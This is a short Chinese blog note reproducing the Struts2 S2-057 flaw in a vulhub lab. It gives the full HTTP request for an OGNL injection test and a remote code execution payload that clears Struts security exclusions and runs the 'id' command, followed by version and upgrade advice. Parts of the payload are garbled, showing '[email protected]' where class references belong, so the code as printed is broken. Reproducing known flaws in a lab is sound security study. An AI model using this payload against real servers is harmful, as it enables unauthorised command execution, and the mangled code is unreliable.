Struts2-057漏洞复现

• 2019 年 10 月 6 日
• 笔记

环境地址：vulhub

http://172.16.1.87:8090/showcase

影响版本：小于等于 Struts 2.3.34 与 Struts 2.5.16

测试一下OGNL的表达式：${233*233}

$%7B233*233%7D/actionChain1.action

请求：

GET/showcase/$%7B233*233%7D/actionChain1.action HTTP/1.1

Host: 172.16.1.87:8090

User-Agent: Mozilla/5.0 (Windows NT 10.0;WOW64; rv:47.0) Gecko/20100101 Firefox/47.0

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language:zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

DNT: 1

Cookie: JSESSIONID=64576605D2AA6BD07160B7C9E6C1A7AA

X-Forwarded-For: 8.8.8.8

Connection: close

可见233*233的结果已经在返回结果头部中了！

利用OGNL表达式进行测试id：

Poc：

${(#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

将poc进行url编码，否则无法成功！

漏洞修复：

该漏洞在两种情况下存在，第一，当xml配置中未设置namespace 值，且上层动作配置（action(s) configurations）中未设置或使用通配符namespace值时，可能导致远程代码执行漏洞的发生。第二，使用未设置 value和action值的url标签，且上层动作配置中未设置或使用通配符namespace值

所以直接升级到最新版本中可以修复漏洞！